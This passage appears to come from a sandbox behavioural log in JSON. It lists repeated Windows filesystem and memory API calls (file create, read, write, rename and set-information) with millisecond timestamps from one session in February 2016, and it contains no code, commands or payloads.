"timestamp": "2016-02-16 17:41:56,844", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:56,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,034", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,064", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:57,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": 